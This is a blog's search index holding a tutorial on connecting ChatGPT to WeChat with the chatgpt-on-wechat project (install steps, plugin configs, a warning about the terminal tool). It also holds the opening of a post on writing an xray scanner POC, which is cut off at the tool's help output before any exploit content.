search.xml
1753 lines (838 loc) · 664 KB
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>ChatGPT 接入微信实践</title>
<link href="/2023/11/05/wechatGPT/"/>
<url>/2023/11/05/wechatGPT/</url>
<content type="html"><![CDATA[<h1 id="ChatGPT-接入微信实践"><a href="#ChatGPT-接入微信实践" class="headerlink" title="ChatGPT 接入微信实践"></a>ChatGPT 接入微信实践</h1><h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h2><p>参考:<a href="https://github.com/zhayujie/chatgpt-on-wechat">https://github.com/zhayujie/chatgpt-on-wechat</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/zhayujie/chatgpt-on-wechat</span><br><span class="line">cd chatgpt-on-wechat/</span><br><span class="line"></span><br><span class="line">pip3 install -r requirements.txt</span><br><span class="line">pip3 install -r requirements-optional.txt</span><br></pre></td></tr></table></figure><p>修改配置文件:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cp config-template.json config.json</span><br><span class="line">vim config.json</span><br></pre></td></tr></table></figure><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span 
class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"open_ai_api_key"</span><span class="punctuation">:</span> <span class="string">"sk-"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"model"</span><span class="punctuation">:</span> <span class="string">"gpt-3.5-turbo"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"channel_type"</span><span class="punctuation">:</span> <span class="string">"wx"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"open_ai_api_base"</span><span class="punctuation">:</span> <span class="string">"https://api.aiproxy.io/v1"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"proxy"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"hot_reload"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"single_chat_prefix"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="string">"bot"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="string">"@bot"</span></span><br><span class="line"> <span 
class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"single_chat_reply_prefix"</span><span class="punctuation">:</span> <span class="string">"[bot] "</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_chat_prefix"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="string">"@bot"</span></span><br><span class="line"> <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_name_white_list"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"ALL_GROUP"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_chat_in_one_session"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="string">"ChatGPT测试群"</span></span><br><span class="line"> <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"image_create_prefix"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="string">"画"</span></span><br><span class="line"> <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"speech_recognition"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_speech_recognition"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"voice_reply_voice"</span><span class="punctuation">:</span> <span 
class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"conversation_max_tokens"</span><span class="punctuation">:</span> <span class="number">1000</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"expires_in_seconds"</span><span class="punctuation">:</span> <span class="number">3600</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"character_desc"</span><span class="punctuation">:</span> <span class="string">"你是ChatGPT, 一个由OpenAI训练的大型语言模型, 你旨在回答并解决人们的任何问题,并且可以使用多种语言与人交流。"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"temperature"</span><span class="punctuation">:</span> <span class="number">0.7</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"top_p"</span><span class="punctuation">:</span> <span class="number">1</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"subscribe_msg"</span><span class="punctuation">:</span> <span class="string">"感谢您的关注!\n这里是ChatGPT,可以自由对话。\n支持语音对话。\n支持图片输入。\n支持图片输出,画字开头的消息将按要求创作图片。\n支持tool、角色扮演和文字冒险等丰富的插件。\n输入{trigger_prefix}#help 查看详细指令。"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"use_linkai"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"linkai_api_base"</span><span class="punctuation">:</span> <span class="string">"https://api.link-ai.tech"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"linkai_api_key"</span><span class="punctuation">:</span> <span class="string">"Link_"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"linkai_app_code"</span><span class="punctuation">:</span> 
<span class="string">""</span></span><br><span class="line"><span class="punctuation">}</span></span><br></pre></td></tr></table></figure><h2 id="API获取"><a href="#API获取" class="headerlink" title="API获取"></a>API获取</h2><p>项目默认使用OpenAI接口,需前往 <a href="https://beta.openai.com/signup">OpenAI注册页面</a> 创建账号,创建完账号则前往 <a href="https://beta.openai.com/account/api-keys">API管理页面</a> 创建一个 API Key 并保存下来,后面需要在项目中配置这个key。接口需要海外网络访问及绑定信用卡支付。</p><p>或者使用第三方API。</p><p>比如:<a href="https://aiproxy.io/%E3%80%82%EF%BC%88%E6%B6%88%E8%B4%B9%E5%BE%88%E5%A4%9A%EF%BC%89">https://aiproxy.io/。(消费很多)</a></p><p>或者:<a href="https://chat.link-ai.tech/">https://chat.link-ai.tech</a> (推荐,便宜)</p><p>注意,配置第三方linkai_api之后,无需再配置open_ai_api_key.</p><p>配置文件如下:</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"> <span 
class="attr">"model"</span><span class="punctuation">:</span> <span class="string">"gpt-3.5-turbo"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"channel_type"</span><span class="punctuation">:</span> <span class="string">"wx"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"proxy"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"hot_reload"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"single_chat_prefix"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="string">"bot"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="string">"@bot"</span></span><br><span class="line"> <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"single_chat_reply_prefix"</span><span class="punctuation">:</span> <span class="string">"[bot] "</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_chat_prefix"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="string">"@bot"</span></span><br><span class="line"> <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_name_white_list"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"ALL_GROUP"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_chat_in_one_session"</span><span class="punctuation">:</span> <span 
class="punctuation">[</span></span><br><span class="line"> <span class="string">"ChatGPT测试群"</span></span><br><span class="line"> <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"image_create_prefix"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="string">"画"</span></span><br><span class="line"> <span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"speech_recognition"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"group_speech_recognition"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"voice_reply_voice"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"conversation_max_tokens"</span><span class="punctuation">:</span> <span class="number">1000</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"expires_in_seconds"</span><span class="punctuation">:</span> <span class="number">3600</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"character_desc"</span><span class="punctuation">:</span> <span class="string">"你是ChatGPT, 一个由OpenAI训练的大型语言模型, 你旨在回答并解决人们的任何问题,并且可以使用多种语言与人交流。"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"temperature"</span><span class="punctuation">:</span> <span class="number">0.7</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"top_p"</span><span 
class="punctuation">:</span> <span class="number">1</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"subscribe_msg"</span><span class="punctuation">:</span> <span class="string">"感谢您的关注!\n这里是ChatGPT,可以自由对话。\n支持语音对话。\n支持图片输入。\n支持图片输出,画字开头的消息将按要求创作图片。\n支持tool、角色扮演和文字冒险等丰富的插件。\n输入{trigger_prefix}#help 查看详细指令。"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"use_linkai"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"linkai_api_base"</span><span class="punctuation">:</span> <span class="string">"https://api.link-ai.tech"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"linkai_api_key"</span><span class="punctuation">:</span> <span class="string">"Link_"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"linkai_app_code"</span><span class="punctuation">:</span> <span class="string">""</span></span><br><span class="line"><span class="punctuation">}</span></span><br></pre></td></tr></table></figure><h2 id="常用命令"><a href="#常用命令" class="headerlink" title="常用命令"></a>常用命令</h2><h3 id="启动程序"><a href="#启动程序" class="headerlink" title="启动程序"></a>启动程序</h3><p>直接启动:<code>python3 app.py</code></p><p>后台运行:<code>nohup python3 app.py & tail -f nohup.out</code></p><p>日志输出到<code>nohup.out</code></p><h3 id="关闭进程"><a href="#关闭进程" class="headerlink" title="关闭进程"></a>关闭进程</h3><p>搜索进程并kill</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ps -ef | grep app.py | grep -v grepkill -9 加进程号</span><br></pre></td></tr></table></figure><h2 id="tool插件"><a href="#tool插件" class="headerlink" title="tool插件"></a>tool插件</h2><h3 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h3><p><a 
href="https://github.com/goldfishh/chatgpt-on-wechat/blob/master/plugins/tool/README.md">https://github.com/goldfishh/chatgpt-on-wechat/blob/master/plugins/tool/README.md</a></p><p><strong>Tool工具:</strong> 与操作系统和互联网交互,支持最新信息搜索、数学计算、天气和资讯查询、网页总结,基于 <a href="https://github.com/goldfishh/chatgpt-tool-hub">chatgpt-tool-hub</a> 实现</p><p>相关API申请方法如下:</p><p><a href="https://github.com/goldfishh/chatgpt-tool-hub/blob/master/docs/apply_optional_tool.md">https://github.com/goldfishh/chatgpt-tool-hub/blob/master/docs/apply_optional_tool.md</a></p><h3 id="配置tool插件"><a href="#配置tool插件" class="headerlink" title="配置tool插件"></a>配置tool插件</h3><p>进入目录配置:plugins/tool</p><p>cp config.json.template config.json</p><p>配置需要开启的插件,有些需要API</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"> <span class="number">1</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="number">2</span> <span class="attr">"tools"</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"> <span class="number">3</span> <span class="string">"news"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="number">4</span> <span 
class="string">"morning-news"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="number">5</span> <span class="string">"wikipedia"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="number">6</span> <span class="string">"python"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="number">7</span> <span class="string">"url-get"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="number">8</span> <span class="string">"terminal"</span><span class="punctuation">,</span></span><br><span class="line"> <span class="number">9</span> <span class="string">"bing-search"</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">10</span> <span class="string">"meteo-weather"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">11</span> <span class="attr">"kwargs"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"><span class="number">12</span> <span class="attr">"llm_api_key"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">13</span> <span class="attr">"proxy"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">14</span> <span class="attr">"debug"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"><span class="number">15</span> <span class="attr">"top_k_results"</span><span class="punctuation">:</span> <span class="number">2</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">16</span> <span class="attr">"no_default"</span><span 
class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"><span class="number">17</span> <span class="attr">"model_name"</span><span class="punctuation">:</span> <span class="string">"gpt-3.5-turbo"</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">18</span> <span class="attr">"news_api_key"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">19</span> <span class="attr">"bing_subscription_key"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span></span><br><span class="line"><span class="number">20</span> <span class="attr">"morning_news_api_key"</span><span class="punctuation">:</span> <span class="string">""</span></span><br><span class="line"><span class="number">21</span> <span class="punctuation">}</span></span><br><span class="line"><span class="number">22</span> <span class="punctuation">}</span></span><br></pre></td></tr></table></figure><h3 id="使用tool插件"><a href="#使用tool插件" class="headerlink" title="使用tool插件"></a>使用tool插件</h3><p>#help tool: 查看tool帮助信息,可查看已加载工具列表<br>$tool 命令: 根据给出的{命令}使用一些可用工具尽力为你得到结果。<br>$tool reset: 重置工具。 </p><h3 id="插件未启用bug"><a href="#插件未启用bug" class="headerlink" title="插件未启用bug"></a>插件未启用bug</h3><p>使用一段时间后,提供插件未启用,排查发现是配置文件自动改为了false.</p><p>重新修改为true即可。</p><p>chatgpt-on-wechat/plugins/plugins.json</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">19 "tool": {</span><br><span class="line">20 "enabled": true,</span><br><span class="line">21 "priority": 0</span><br><span class="line">22 },</span><br></pre></td></tr></table></figure><h2 id="知识库平台配置"><a 
href="#知识库平台配置" class="headerlink" title="知识库平台配置"></a>知识库平台配置</h2><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h3><p><a href="https://github.com/zhayujie/chatgpt-on-wechat/tree/master/plugins/linkai">https://github.com/zhayujie/chatgpt-on-wechat/tree/master/plugins/linkai</a></p><p><a href="https://link-ai.tech/platform/link-app/wechat">https://link-ai.tech/platform/link-app/wechat</a></p><h3 id="获取API"><a href="#获取API" class="headerlink" title="获取API"></a>获取API</h3><p>进入控制台:</p><p><a href="https://chat.link-ai.tech/console/factory">https://chat.link-ai.tech/console/factory</a></p><p>新用户有免费的600积分。</p><p>我充值了1w积分,生成一张图片需要150积分。</p><h3 id="配置插件"><a href="#配置插件" class="headerlink" title="配置插件"></a>配置插件</h3><p>将 <code>plugins/linkai</code> 目录下的 <code>config.json.template</code> 配置模板复制为最终生效的 <code>config.json</code>。</p><p>配置项中 <code>group_app_map</code> 部分是用于映射群聊与LinkAI平台上的应用, <code>midjourney</code> 部分是 mj 画图的配置,<code>summary</code> 部分是文档总结及对话功能的配置。三部分的配置相互独立,可按需开启。</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"group_app_map"</span><span class="punctuation">:</span> <span class="punctuation">{</span> # 群聊 和 应用编码 的映射关系</span><br><span class="line"> <span class="attr">"测试群名称1"</span><span 
class="punctuation">:</span> <span class="string">"default"</span><span class="punctuation">,</span> # 表示在名称为 <span class="string">"测试群名称1"</span> 的群聊中将使用app_code 为 default 的应用</span><br><span class="line"> <span class="attr">"测试群名称2"</span><span class="punctuation">:</span> <span class="string">"Kv2fXJcH"</span></span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"midjourney"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"enabled"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span> # midjourney 绘画开关</span><br><span class="line"> <span class="attr">"auto_translate"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span> # 是否自动将提示词翻译为英文</span><br><span class="line"> <span class="attr">"img_proxy"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span> # 是否对生成的图片使用代理,如果你是国外服务器,将这一项设置为<span class="literal"><span class="keyword">false</span></span>会获得更快的生成速度</span><br><span class="line"> <span class="attr">"max_tasks"</span><span class="punctuation">:</span> <span class="number">3</span><span class="punctuation">,</span> # 支持同时提交的总任务个数</span><br><span class="line"> <span class="attr">"max_tasks_per_user"</span><span class="punctuation">:</span> <span class="number">1</span><span class="punctuation">,</span> # 支持单个用户同时提交的任务个数</span><br><span class="line"> <span class="attr">"use_image_create_prefix"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span> # 是否使用全局的绘画触发词,如果开启将同时支持由`config.json`中的 image_create_prefix 配置触发</span><br><span class="line"> <span class="punctuation">}</span><span 
class="punctuation">,</span></span><br><span class="line"> <span class="attr">"summary"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"enabled"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span> # 文档总结和对话功能开关</span><br><span class="line"> <span class="attr">"group_enabled"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span> # 是否支持群聊开启</span><br><span class="line"> <span class="attr">"max_file_size"</span><span class="punctuation">:</span> <span class="number">5000</span> # 文件的大小限制,单位KB,默认为<span class="number">5</span>M,超过该大小直接忽略</span><br><span class="line"> <span class="punctuation">}</span></span><br><span class="line"><span class="punctuation">}</span></span><br></pre></td></tr></table></figure><h3 id="主配置文件"><a href="#主配置文件" class="headerlink" title="主配置文件"></a>主配置文件</h3><p>添加下面几行。</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">"use_linkai"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"linkai_api_key"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">"linkai_app_code"</span><span class="punctuation">:</span> <span class="string">""</span><span class="punctuation">,</span> #选填</span><br><span class="line"><span class="attr">"linkai_api_base"</span><span class="punctuation">:</span> <span class="string">"https://api.link-ai.chat"</span><span 
class="punctuation">,</span> # linkAI服务地址,若国内无法访问或延迟较高可改为 https<span class="punctuation">:</span><span class="comment">//api.link-ai.tech</span></span><br></pre></td></tr></table></figure><p>刚开始没有写linkai_api_base,会报错。加入这个参数之后可以正常使用。</p><h3 id="Midjourney绘图功能"><a href="#Midjourney绘图功能" class="headerlink" title="Midjourney绘图功能"></a>Midjourney绘图功能</h3><p>开启之后,艾特机器人,并输入提示词”画”,就会根据要求输出图片。</p><h3 id="文档总结功能"><a href="#文档总结功能" class="headerlink" title="文档总结功能"></a>文档总结功能</h3><p>该功能依赖 LinkAI的知识库及对话功能,需要在项目根目录的config.json中设置 <code>linkai_api_key</code>, 同时根据上述插件配置说明,在插件config.json添加 <code>summary</code> 部分的配置,设置 <code>enabled</code> 为 true。</p><p>如果不想创建 <code>plugins/linkai/config.json</code> 配置,可以直接通过 <code>$linkai sum open</code> 指令开启该功能。</p><p>功能开启后,向机器人发送 <strong>文件</strong> 或 <strong>分享链接卡片</strong> 即可生成摘要,进一步可以与文件或链接的内容进行多轮对话。</p><ol><li>文件目前 支持 <code>txt</code>, <code>docx</code>, <code>pdf</code>, <code>md</code>, <code>csv</code>格式,文件大小由 <code>max_file_size</code> 限制,最大不超过15M,文件字数最多可支持百万字的文件。但不建议上传字数过多的文件,一是token消耗过大,二是摘要很难覆盖到全部内容,只能通过多轮对话来了解细节。</li><li>分享链接 目前仅支持 公众号文章,后续会支持更多文章类型及视频链接等</li><li>总结及对话的 费用与 LinkAI 3.5-4K 模型的计费方式相同,按文档内容的tokens进行计算</li></ol><h2 id="语音功能"><a href="#语音功能" class="headerlink" title="语音功能"></a>语音功能</h2><p>暂时报错,未解决。</p><p>提示缺少ffmpeg ,安装后发现后台运行会报错,且未解决问题。</p><p>于是直接关闭语音识别和回复语音的功能。</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">23</span> <span class="attr">"speech_recognition"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br><span class="line"><span class="number">24</span> <span class="attr">"group_speech_recognition"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span 
class="punctuation">,</span></span><br><span class="line"><span class="attr">"voice_reply_voice"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span><span class="punctuation">,</span></span><br></pre></td></tr></table></figure><h2 id="效果演示"><a href="#效果演示" class="headerlink" title="效果演示"></a>Demo</h2><h3 id="工具列表"><a href="#工具列表" class="headerlink" title="工具列表"></a>Tool list</h3><p><img src="/2023/11/05/wechatGPT/tools.jpg" alt="tools"></p><h3 id="今日新闻"><a href="#今日新闻" class="headerlink" title="今日新闻"></a>Today's news</h3><p><img src="/2023/11/05/wechatGPT/news.jpg" alt="news"></p><h3 id="操作电脑终端"><a href="#操作电脑终端" class="headerlink" title="操作电脑终端"></a>Operating the computer's terminal</h3><p><img src="/2023/11/05/wechatGPT/terminal.jpg" alt="terminal"></p><h3 id="Midjourney画图"><a href="#Midjourney画图" class="headerlink" title="Midjourney画图"></a>Midjourney drawing</h3><p><img src="/2023/11/05/wechatGPT/Midjourney.jpg" alt="Midjourney"></p><h3 id="Url-Get"><a href="#Url-Get" class="headerlink" title="Url-Get"></a>Url-Get</h3><p><img src="/2023/11/05/wechatGPT/urlget.jpg" alt="urlget"></p><h3 id="生成摘要"><a href="#生成摘要" class="headerlink" title="生成摘要"></a>Generating a summary</h3><p><img src="/2023/11/05/wechatGPT/zhaiyao.jpg" alt="zhaiyao"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>It took a full day, but the bot is now connected to WeChat. It works well and can act as a group assistant, and the tool plugin makes it considerably more capable. Keep in mind that the <code>terminal</code> tool runs commands on the host where the bot is deployed, so anyone who can message the bot in a group where it is enabled can drive it; enable it only in groups you control.</p><p>For example:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Loaded tool list: </span><br><span class="line">python, url-get, python, summary, terminal, browser, url-get, wikipedia, arxiv, hello-tool, google-search, wolfram-alpha, debug, answer-user, news-api, finance-news, morning-news, news, bing-search, searxng-search, meteo-weather, morning-news, wikipedia, meteo-weather, terminal</span><br></pre></td></tr></table></figure><p>It needs server resources, GPT API quota and LinkAI credit for the Midjourney integration; with many users that adds up to a considerable expense.</p><h2 id="参考-1"><a href="#参考-1" class="headerlink" title="参考"></a>References</h2><p><a href="https://www.wangpc.cc/aigc/wechat_com-chatgpt/">https://www.wangpc.cc/aigc/wechat_com-chatgpt/</a></p><p><a href="https://www.zsanjin.de/posts-gpt4api.html">https://www.zsanjin.de/posts-gpt4api.html</a></p>]]></content>
<categories>
<category> blog </category>
</categories>
<tags>
<tag> blog </tag>
<tag> ChatGPT </tag>
</tags>
</entry>
<entry>
<title>Writing an xray POC, using CVE-2023-42442 as the example</title>
<link href="/2023/09/23/xray/"/>
<url>/2023/09/23/xray/</url>
<content type="html"><![CDATA[<h1 id="xray下载"><a href="#xray下载" class="headerlink" title="xray下载"></a>Downloading xray</h1><p>Download and use the community edition.</p><p>Make sure to download a recent release; older versions may fail to load custom POCs.</p><p><a href="https://github.com/chaitin/xray/releases">https://github.com/chaitin/xray/releases</a></p><h1 id="使用方法"><a href="#使用方法" class="headerlink" title="使用方法"></a>Usage</h1><p>Show the top-level help. The output below is the global help, so the command is run without a subcommand:</p><p><code>xray_windows_amd64.exe --help</code></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">Version: 1.9.11/eb0c331d/COMMUNITY</span><br><span class="line"></span><br><span class="line">NAME:</span><br><span class="line"> xray - A powerful scanner engine [https://docs.xray.cool]</span><br><span class="line"></span><br><span class="line">USAGE:</span><br><span class="line"> [global options] command [command options] [arguments...]</span><br><span class="line"></span><br><span class="line">COMMANDS:</span><br><span class="line"> webscan, ws Run a webscan task</span><br><span class="line"> servicescan, ss Run a service scan 
